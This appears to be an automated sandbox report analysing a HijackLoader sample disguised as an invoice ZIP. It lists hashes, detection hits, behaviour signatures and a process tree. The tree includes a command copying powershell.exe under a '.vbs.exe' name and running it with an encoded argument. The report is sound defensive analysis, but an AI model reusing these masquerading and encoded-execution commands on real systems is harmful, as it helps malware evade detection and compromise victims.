Analysis
- max time kernel: 96s
- max time network: 146s
- platform: windows11-21h2_x64
- resource: win11-20241007-en
- resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 09-10-2024 15:15
- Static task: static1
- Behavioral task: behavioral1
- Sample: facturagm-27725407957355783426.zip
- Resource: win11-20241007-en
General
- Target: facturagm-27725407957355783426.zip
- Size: 49.2MB
- MD5: 79e9ed02ff9d617c1732776ff596f47a
- SHA1: 9e3dd3c140198fc5ff080dec7d610f5bb04d2e4a
- SHA256: 48fa854012e6abef23589909ec3293efc3df0ab2b5ef4406ccaf7ee0b68464c6
- SHA512: 7b418b82b6f8b7fb165ee2ca3a014ce94bd229a10d11fc141be8dea47a728e04670cfa795757d0ea6bf127db13952c4e4b1bc4ec3f25f623a5f108734b76d241
- SSDEEP: 1572864:4ltjOLVis6A90iwyhwLmWaBOZF+QLr45/rby0:4ltjORX9VnqaBOj96/Xy0
Malware Config
Signatures

- Detects HijackLoader (aka IDAT Loader) (3 IoCs)
  HijackLoader is a multistage loader first seen in 2023.
  Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\app.asar.unpacked\chronicle.svg | family_hijackloader
  C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\cardigan.mpeg | family_hijackloader
  C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\27725407957355783426\resources\Data\Plugins\toparch.svg | family_hijackloader

- Process spawned unexpected child process (1 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (cmd.exe):
  description | pid | pid_target | process | target process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4548 | 276 | cmd.exe |

- Executes dropped EXE (1 IoCs)
  Processes (facturagm-27725407957355783426.vbs.exe):
  pid | process
  2840 | facturagm-27725407957355783426.vbs.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes (facturagm-27725407957355783426.vbs.exe):
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | facturagm-27725407957355783426.vbs.exe

- Modifies registry class (1 IoCs)
  Processes (WScript.exe):
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | WScript.exe

- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (facturagm-27725407957355783426.vbs.exe):
  pid | process
  2840 | facturagm-27725407957355783426.vbs.exe
  2840 | facturagm-27725407957355783426.vbs.exe

- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (7zG.exe, facturagm-27725407957355783426.vbs.exe):
  description | pid | process
  Token: SeRestorePrivilege | 416 | 7zG.exe
  Token: 35 | 416 | 7zG.exe
  Token: SeSecurityPrivilege | 416 | 7zG.exe
  Token: SeSecurityPrivilege | 416 | 7zG.exe
  Token: SeDebugPrivilege | 2840 | facturagm-27725407957355783426.vbs.exe

- Suspicious use of FindShellTrayWindow (1 IoCs)
  Processes (7zG.exe):
  pid | process
  416 | 7zG.exe

- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (WScript.exe):
  description | pid | process | target process
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | facturagm-27725407957355783426.vbs.exe
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | facturagm-27725407957355783426.vbs.exe
  PID 3172 wrote to memory of 2840 | 3172 | WScript.exe | facturagm-27725407957355783426.vbs.exe
Processes

- C:\Windows\Explorer.exe
  Command line: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426.zip
  PID: 3796

- C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
  PID: 4820

- C:\Program Files\7-Zip\7zG.exe
  Command line: "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\" -spe -an -ai#7zMap2430:140:7zEvent5807
  PID: 416
  Signatures: Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow

- C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs"
  PID: 3172
  Signatures: Modifies registry class; Suspicious use of WriteProcessMemory

  - C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" -enc 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
    PID: 2840
    Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\cmd.exe
  Command line: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\facturagm-27725407957355783426\facturagm-27725407957355783426.vbs.exe" /Y
  PID: 4548
  Signatures: Process spawned unexpected child process
Network
MITRE ATT&CK Enterprise v15
Downloads